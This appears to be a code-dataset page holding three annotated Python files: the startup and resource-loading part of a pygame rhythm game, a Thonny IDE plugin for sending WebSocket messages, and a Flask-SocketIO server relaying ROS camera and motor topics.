    # double-scales if scale ever changes; confirm intent.
    radius = int(CS * scale)
    for i in range(10):
        texName = 'circlefont_' + str(i)
        tex = Texture("{}circles/{}.png".format(texPath, i))
        tex.ScaleLinear(radius * 2 * scale)
        mainResManager.AddTexture(texName, tex)
    for i in range(5):
        texName = 'circlebg_'+ str(i)
        tex = Texture("{}circles/circlebg_{}.png".format(texPath, i))
        tex.Scale(radius * 2 * scale)
        mainResManager.AddTexture(texName, tex)
    # hit-flash overlay shown when a circle is clicked
    circleHit = Texture(texPath + "circles/circlehit.png")
    circleHit.Scale(radius* 2 * scale)
    mainResManager.AddTexture("hitlayout", circleHit)
def LoadInterfaceTextures():
    """Load the cursor, miss indicator and settings icon textures into the
    main resource manager, scaled for the current resolution."""
    entries = (
        ("cursor", 'cursor.png', int(32 * prefs.cursorSize * scale)),
        ("miss", 'miss.png', 16 * scale),
        ('setsIcn', 'settingsIcon.png', 48 * scale),
    )
    for key, filename, size in entries:
        tex = Texture(texPath + filename)
        tex.Scale(size)
        mainResManager.AddTexture(key, tex)
def LoadBackgroundTextures():
    # Load every image in the backgrounds folder as textures bg_0..bg_N,
    # plus the menu background.
    filenames = [name for name in os.listdir(os.path.join(texPath, 'backgrounds')) if os.path.isfile(os.path.join(texPath, 'backgrounds', name))]
    try:
        # Windows thumbnail cache may be present in the folder
        filenames.remove("Thumbs.db")
    except Exception:
        pass
    for idx, filename in enumerate(filenames):
        texName = 'bg_' + str(idx)
        tex = Texture("{}backgrounds/{}".format(texPath, filename))
        # NOTE(review): this multiplier rescale appears to be immediately
        # overridden by the resolution rescale on the next line -- possibly
        # redundant; confirm.
        tex.ScaleLinearXY(int(tex.Width * prefs.bgScaleMultiplier), int(tex.Height * prefs.bgScaleMultiplier))
        tex.ScaleLinearXY(prefs.resolution[0], prefs.resolution[1])
        tex.Dim(prefs.darkenPercent)
        mainResManager.AddTexture(texName, tex)
    menuBg = Texture(texPath + 'backgrounds/menu_background.png')
    menuBg.ScaleXY(prefs.resolution[0], prefs.resolution[1])
    mainResManager.AddTexture("menu_background", menuBg)
def LoadSounds():
    """Load the hit, miss and button sounds into the main resource manager.

    Each sound's volume is set from the user's master volume preference.
    Prints and logs any loading error, then re-raises it.
    """
    try:
        for i in range(1, 3):
            hitSound = Sound("{}hit{}.wav".format(soundsPath, i))
            hitSound.SetVolume(prefs.masterVolume)
            mainResManager.AddSound("hit" + str(i), hitSound)
        miss = Sound(soundsPath + "miss.wav")
        miss.SetVolume(prefs.masterVolume)
        mainResManager.AddSound("miss", miss)
        btn = Sound(soundsPath + "button_slide.wav")
        btn.SetVolume(prefs.masterVolume)
        # BUG FIX: previously this registered `miss` under the
        # "button_slide" key, so the loaded button sound was never used.
        mainResManager.AddSound("button_slide", btn)
    except Exception as e:
        print("An error appeared during sounds loading.")
        Log(str(e), LogLevel.Error, __name__)
        raise
def Start(debugMode):
    # Main entry point: load preferences, initialize pygame, create the
    # window, load resources, then run the menu loop until exit.
    # NOTE(review): the debugMode parameter is unused -- debug logging is
    # always enabled; confirm.
    debug.Enable()
    #load prefs
    LoadPreferencies()
    #set scaling factor (for now doesn't work)
    global scale
    scale = GetScalingFactor(GetScale(prefs.resolution[0], prefs.resolution[1]))
    if scale != 1:
        scale = 1
    print('Initiaizing oss!')
    #initialize pygame
    InitPygame()
    if prefs.lockMouse:
        pygame.event.set_grab(True)
    #set used SDL events (all others are ignored for performance)
    pygame.event.set_allowed([pygame.QUIT, pygame.KEYDOWN, pygame.MOUSEBUTTONDOWN, pygame.MOUSEMOTION])
    #set game stats (AR, CS, HP) from the raw module-level values
    global AR, CS, HP
    AR, CS, HP = SetGameStats(AR_raw, CS_raw, HP_raw)
    #initialize window
    global mainWindow
    mainWindow = InitializeWindow(prefs.resolution[0], prefs.resolution[1])
    #initialize resources
    LoadTextures()
    LoadSounds()
    #pre-register every font size the UI uses
    mainFont = pygame.font.SysFont('comicsansms', 22 * scale)
    mainResManager.AddMainFont(mainFont)
    mainResManager.AddFont("comicsansms_48", pygame.font.SysFont('comicsansms', 48 * scale))
    mainResManager.AddFont("comicsansms_24", pygame.font.SysFont('comicsansms', 24 * scale))
    mainResManager.AddFont("comicsansms_22", pygame.font.SysFont("comicsansms", 22 * scale))
    mainResManager.AddFont("comicsansms_21", pygame.font.SysFont("comicsansms", 21 * scale))
    mainResManager.AddFont("comicsansms_18", pygame.font.SysFont('comicsansms', 18 * scale))
    mainResManager.AddFont("comicsansms_12", pygame.font.SysFont('comicsansms', 12 * scale))
    mainResManager.AddFont("comicsansms_10", pygame.font.SysFont("comicsansms", 10 * scale))
    #import menu module here to avoid circular import
    import menu
    #free memory after initialization
    FreeMem()
    try:
        # `start` is the module-level perf counter captured at import time
        Log("Program loaded in {} seconds.".format(time.perf_counter() - start), LogLevel.Info, __name__)
        # NOTE(review): `initialized` is never read afterwards
        initialized = True
        print('Welcome to Oss!')
        m = menu.Menu(mainWindow)
        m.Run()
        print('Goodbye!')
        Log("Program exited after: {} seconds.".format(m.time), LogLevel.Info, __name__)
        pygame.mixer.quit()
        pygame.quit()
        FreeMem()
        StopGCThreads()
        os.system('pause >NUL')
        sys.exit()
    except Exception as e:
        print('An error appeared. {}'.format(e))
        raise
|
thonny-ws.py | from thonny import get_workbench
import websocket
from threading import Thread
from tkinter.simpledialog import askstring
def on_message(ws, message):
    """Callback invoked when the client receives a message.

    :param ws: WebSocketApp object the message arrived on
    :param message: message object represented as string

    Returns:
        None
    """
    print("Message from {} received: {}".format(ws.url, message))
def on_error(ws, error):
    """Callback invoked when the client receives an error.

    :param ws: WebSocketApp object
    :param error: error object (typically an exception instance, not a str)

    Returns:
        None
    """
    # BUG FIX: `error` is an object, so the previous `+` concatenation
    # raised TypeError for non-string errors (the common case, since
    # websocket-client passes exception instances). format() stringifies
    # it safely without changing output for plain strings.
    print("Error from {} received: {}".format(ws.url, error))
def on_close(ws):
    """Callback invoked after the connection is closed.

    :param ws: WebSocketApp object

    Returns:
        None
    """
    print("Connection closed to server: {}".format(ws.url))
def on_open(ws):
    """Callback invoked after the connection is opened.

    :param ws: WebSocketApp object

    Returns:
        None
    """
    print("Connection opened to server: {}".format(ws.url))
def run_in_background():
    """Listen for messages on the most recently added WebSocketApp.

    Blocks the calling thread, so it must be run in its own thread.

    Returns:
        None
    """
    connections = Singleton.getInstance().get_wsList()
    # the newest connection is the last one appended to the shared list
    connections[-1].run_forever()
class Singleton:
    """Process-wide registry of open WebSocketApp connections.

    This Singleton class is needed because the list of WebSocketApp
    objects is shared across the plugin's commands.

    __instance: The current instance of this class.
    """

    __instance = None

    @staticmethod
    def getInstance():
        """Return the single instance, creating it on first access.

        Returns:
            Singleton object holding the list of WebSocketApp objects
        """
        # IDIOM FIX: compare to None with `is`, not `==`
        if Singleton.__instance is None:
            Singleton()
        return Singleton.__instance

    def __init__(self):
        """Create the singleton instance with an empty connection list.

        Raises:
            Exception: if the singleton instance already exists.
        """
        # IDIOM FIX: identity comparison; guard clause instead of else-branch
        if Singleton.__instance is not None:
            raise Exception("This class is a singleton!")
        self.wsList = []
        Singleton.__instance = self

    def get_wsList(self):
        """Return the shared list of WebSocketApp objects."""
        return self.wsList

    def add_ws(self, ws):
        """Add a WebSocketApp object to the list.

        :param ws: WebSocketApp object

        Returns:
            None
        """
        self.wsList.append(ws)

    def remove_ws(self, server_address):
        """Remove and close the first connection matching server_address.

        :param server_address: server address represented as a string

        Returns:
            None
        """
        for ws in self.wsList:
            if ws.url == server_address:
                # safe despite removing during iteration: we return at once
                self.wsList.remove(ws)
                ws.close()
                return

    def send_message(self, server_address, message):
        """Send a message over the connection matching server_address.

        :param server_address: server address represented as a string
        :param message: message represented as a string

        Returns:
            None
        """
        for ws in self.wsList:
            if ws.url == server_address:
                ws.send(message)
                print("Sent " + message + " to " + ws.url)
                return
        print(
            "Message can't be sent to "
            + server_address
            + " as there is no established connection."
        )
def add_ws_server():
    """Handler for the "Add WS Server" command in the "tools" menu.

    Asks the user for a server address, registers a WebSocketApp for it, and
    starts a daemon thread running "run_in_background" to listen for messages.
    Returns:
        None
    """
    server_address = askstring("Websocket", "Which server would you like to add?")
    # askstring returns None when the dialog is cancelled; don't try to build
    # a connection to None in that case.
    if server_address is None:
        return
    ws = websocket.WebSocketApp(
        server_address, on_message=on_message, on_error=on_error, on_close=on_close,
    )
    ws.on_open = on_open
    Singleton.getInstance().add_ws(ws)
    t = Thread(target=run_in_background)
    t.daemon = True
    t.start()
def close_ws_server():
    """Handler for the "Close WS Server connection" command in the "tools" menu.

    Asks the user for a server address and removes the matching connection via
    the Singleton's remove_ws method.
    Returns:
        None
    """
    server_address = askstring("Websocket", "Which server connection should be closed?")
    # askstring returns None when the dialog is cancelled; nothing to close.
    if server_address is None:
        return
    Singleton.getInstance().remove_ws(server_address)
def send_message():
    """Handler for the "Send Message" command in the "tools" menu.

    Asks the user for a server address and a message, then forwards both to the
    Singleton's send_message method.
    Returns:
        None
    """
    server_address = askstring("Websocket", "Which server would you like to message?")
    # askstring returns None on cancel; without this guard the fallback print
    # in Singleton.send_message would concatenate a str with None (TypeError).
    if server_address is None:
        return
    message = askstring("Message", "What is your message?")
    if message is None:
        return
    Singleton.getInstance().send_message(server_address, message)
def load_plugin():
    """Register this plugin's commands with the thonny workbench.

    Called by thonny on startup when this plugin is on the PYTHONPATH
    environment variable.
    Returns:
        None
    """
    # This call enables DEBUG messages
    websocket.enableTrace(True)
    get_workbench().add_command(
        command_id="ws_add",
        menu_name="tools",
        command_label="Add WS Server",
        handler=add_ws_server,
    )
    get_workbench().add_command(
        command_id="ws_remove",
        menu_name="tools",
        command_label="Close WS Server connection",
        handler=close_ws_server,
    )
    get_workbench().add_command(
        # Bug fix: this command previously reused command_id "ws_remove",
        # colliding with the "Close WS Server connection" command above.
        command_id="ws_send",
        menu_name="tools",
        command_label="Send Message",
        handler=send_message,
    )
|
main_server.py | #!/usr/bin/env python3
import signal
import sys
import threading

import rospy
from flask import Flask, render_template
from flask_socketio import SocketIO, send, emit

from publishers.move_pub import MovePub
from subscribers.image_sub import ImageSub
# Bind on all interfaces so clients elsewhere on the network can connect.
HOST_IP = "0.0.0.0"
HOST_PORT = 4040
class SubInfo:
    """Record tying a ROS topic to its socketio route and id.

    Also holds a reference to the subscriber object (``sub``) so it is not
    garbage collected.
    """

    def __init__(self, ros_topic, sio_route, sio_id, sub):
        # Values are stored verbatim; no validation is performed.
        self.sub = sub
        self.sio_id = sio_id
        self.sio_route = sio_route
        self.ros_topic = ros_topic
class PubInfo:
    """Record tying a ROS topic to its publisher object (``pub``)."""

    def __init__(self, ros_topic, pub):
        # Values are stored verbatim; no validation is performed.
        self.pub = pub
        self.ros_topic = ros_topic
# Flask application wrapped by the socketio server below.
app = Flask(__name__)
# NOTE(review): cors_allowed_origins="*" accepts any origin — confirm this is
# intended outside of a closed/local network.
sio = SocketIO(app, cors_allowed_origins="*", async_mode='gevent')
# Maps socketio image id to ROS topic name
image_handles = ['camera_stream', 'img_sub']
# aux storage to make sure subscriber objects aren't garbage collected
# (the .sub fields are filled in by the __main__ block at startup)
subscribers = {
'camera_h': SubInfo('/nautilus/cameras/stream', 'Image Display', 'camera_stream', None),
'img_h': SubInfo('/image/distribute', 'Image Display', 'img_sub', None),
}
# Map of handles to rospy pub objects
publishers = {
'move_h': PubInfo('/nautilus/motors/commands', None),
}
@sio.on("Get IDs")
def send_image_id():
    """Reply to a "Get IDs" request by broadcasting every image handle id."""
    payload = {'ids': image_handles}
    sio.emit("IDs", payload, broadcast=True)
@sio.on("Send State")
def send_move_state(data):
    """Forward a movement-state payload from a client to the move publisher."""
    move_pub = publishers['move_h'].pub
    move_pub.update_state(data)
def shutdown_server(signum, frame):
    """SIGINT handler: stop the socketio server and exit the process.

    :param signum: number of the signal that triggered the handler
    :param frame: current stack frame at interrupt time (unused)
    """
    rospy.loginfo("Shutting down main server")
    sio.stop()
    # sys.exit raises SystemExit cleanly; the builtin exit() is a site-module
    # convenience intended for interactive sessions and may be unavailable.
    sys.exit(signal.SIGTERM)
if __name__ == '__main__':
    """ Sets up rospy and starts servers """
    # NOTE(review): this loginfo runs before init_node — verify it is actually
    # recorded by rosout.
    rospy.loginfo("main server is running")
    rospy.init_node('surface', log_level=rospy.DEBUG)
    # Register our subscribers and publishers
    # (fills in the .sub/.pub fields declared as None at module level)
    for handle in ['camera_h', 'img_h']:
        subinfo = subscribers[handle]
        subinfo.sub = ImageSub(
            subinfo.ros_topic, subinfo.sio_route, subinfo.sio_id, sio)
    publishers['move_h'].pub = MovePub(publishers['move_h'].ros_topic)
    # Define a way to exit gracefully
    signal.signal(signal.SIGINT, shutdown_server)
    # Start the ROS services and sio server
    # rospy.spin runs on a daemon thread so sio.run can own the main thread;
    # the daemon flag lets the process exit without joining it.
    threading.Thread(target=rospy.spin, daemon=True).start()
    sio.run(app, host=HOST_IP, port=HOST_PORT)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.